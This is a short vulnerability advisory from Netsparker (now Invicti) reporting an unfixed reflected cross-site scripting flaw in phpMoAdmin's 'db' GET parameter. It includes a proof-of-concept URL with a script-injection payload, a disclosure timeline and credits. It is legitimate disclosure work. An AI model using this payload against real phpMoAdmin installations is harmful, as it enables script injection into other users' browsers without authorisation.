Cross-site Scripting Vulnerability Identified in phpMoAdmin

Information

Advisory by Netsparker (now Invicti)
Name: XSS Vulnerability in phpMoAdmin
Affected Software: phpMoAdmin
Vendor Homepage: http://www.phpmoadmin.com
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Not fixed
Invicti Advisory Reference: NS-15-010

Technical Details

Proof of Concept URL for XSS in phpMoAdmin:

Page: mo_admin.php
Parameter Name: db
Parameter Type: GET
Attack Pattern: http://example.com/phpMoAdmin/moadmin.php?db='"--></style></scRipt><scRipt>alert(0x0010CA)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline

216/03/2015 – First Contact
08/06/2015 – Second Contact
30/06/2015 – Third Contact
30/07/2015 – Advisory released

Credits & Authors

These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.